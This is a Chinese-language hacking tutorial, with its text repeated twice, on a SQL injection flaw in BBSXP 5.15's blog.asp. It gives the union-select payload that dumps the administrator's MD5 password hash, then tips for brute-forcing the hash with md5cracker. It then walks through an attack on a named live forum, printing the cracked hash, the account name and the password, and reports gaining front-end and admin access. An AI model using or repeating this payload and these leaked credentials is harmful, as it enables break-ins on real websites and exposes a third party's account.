BBSXP5.15最新漏洞精簡版
更新時(shí)間:2007年01月16日 00:00:00 作者:
首先打開www.google.com在輸入Po......bBsxp5.15有很多這樣的論壇,隨便點(diǎn)個(gè),好就這個(gè)bbs.yuntea.com 真幸運(yùn),這個(gè)站還沒打上補(bǔ)丁,一口做氣殺到底,bbsxp5.15最新漏洞 ,漏洞主要出在BLOG.ASP 可以讓直接構(gòu)造數(shù)據(jù)庫命令
blog.asp?id=1%20union%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig]
后臺(tái)區(qū)長的md5密碼就顯示出來了。
前臺(tái)密碼也可以出來,
網(wǎng)上已經(jīng)有相關(guān)動(dòng)畫,軟件。
就利用這個(gè)漏洞,肯定有一批bbsxp的網(wǎng)站要倒下了
接下來就是講工具了,準(zhǔn)備好MD5密碼破解器
關(guān)于md5的破解,比較好使的有md5cracker速度增強(qiáng)版。
1。先用8位或9位數(shù)字跑。很快。
2。如果不行,用小寫字母跑。選擇5-6位比較好。
3。再不行,說明密碼可能使字母加數(shù)字,可以碰碰運(yùn)氣??梢耘渲靡粋€(gè)精品自典,比如10G的,
跑上及幾個(gè)小時(shí)。(你的機(jī)器配置必須很好)
4。再不行,建議放棄,太變態(tài)了。
前臺(tái)ok...后臺(tái)密碼..(注:你必須知道管理員的帳號(hào))
直接默認(rèn)的配置就是直接拿下后臺(tái)密碼...
直接吧前臺(tái)md5密碼暴出來。
剩下的事就事破解md5了。
現(xiàn)在開始進(jìn)行工作了,在http://bbs.yuntea.com/+bl......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig]
就成了http://bbs.yuntea.com/blo......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig]
他的密碼是7CB2BE65EB9F215215A0725A10B6E39E可能前臺(tái)的密碼和后臺(tái)一樣,如果有2個(gè)加密密碼那就是代表1個(gè)是前臺(tái)的一個(gè)是后臺(tái)的,不多說了,看操作
按照上面工具的介紹先用數(shù)字把,
正在破===耐心等等
我接條信息,大家不介意把~
出來了,密碼是82246124,登入,,他的帳號(hào)是wzwu,密碼82246124,登入成功,后臺(tái)登入,密碼82246124,登入成功,下面的因該知道把,我也就不多說了,以免遭到人家的痛罵。
bBsxp5.15最新漏洞的原始作者不清
blog.asp?id=1%20union%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig]
后臺(tái)區(qū)長的md5密碼就顯示出來了。
前臺(tái)密碼也可以出來,
網(wǎng)上已經(jīng)有相關(guān)動(dòng)畫,軟件。
就利用這個(gè)漏洞,肯定有一批bbsxp的網(wǎng)站要倒下了
接下來就是講工具了,準(zhǔn)備好MD5密碼破解器
關(guān)于md5的破解,比較好使的有md5cracker速度增強(qiáng)版。
1。先用8位或9位數(shù)字跑。很快。
2。如果不行,用小寫字母跑。選擇5-6位比較好。
3。再不行,說明密碼可能使字母加數(shù)字,可以碰碰運(yùn)氣??梢耘渲靡粋€(gè)精品自典,比如10G的,
跑上及幾個(gè)小時(shí)。(你的機(jī)器配置必須很好)
4。再不行,建議放棄,太變態(tài)了。
前臺(tái)ok...后臺(tái)密碼..(注:你必須知道管理員的帳號(hào))
直接默認(rèn)的配置就是直接拿下后臺(tái)密碼...
直接吧前臺(tái)md5密碼暴出來。
剩下的事就事破解md5了。
現(xiàn)在開始進(jìn)行工作了,在http://bbs.yuntea.com/+bl......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig]
就成了http://bbs.yuntea.com/blo......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig]
他的密碼是7CB2BE65EB9F215215A0725A10B6E39E可能前臺(tái)的密碼和后臺(tái)一樣,如果有2個(gè)加密密碼那就是代表1個(gè)是前臺(tái)的一個(gè)是后臺(tái)的,不多說了,看操作
按照上面工具的介紹先用數(shù)字把,
正在破===耐心等等
我接條信息,大家不介意把~
出來了,密碼是82246124,登入,,他的帳號(hào)是wzwu,密碼82246124,登入成功,后臺(tái)登入,密碼82246124,登入成功,下面的因該知道把,我也就不多說了,以免遭到人家的痛罵。
bBsxp5.15最新漏洞的原始作者不清
相關(guān)文章
Sql Server 應(yīng)用程序的高級(jí)Sql注入
這篇文章討論常用的"sql注入"技術(shù)的細(xì)節(jié),應(yīng)用于流行的Ms IIS/ASP/SQL-Server平臺(tái)。這里探討有關(guān)這種攻擊各種可以注入程序訪問數(shù)據(jù)和數(shù)據(jù)庫防范的方法。2009-01-01Sql Injection in DB2數(shù)據(jù)庫
Sql Injection in DB2數(shù)據(jù)庫...2007-01-01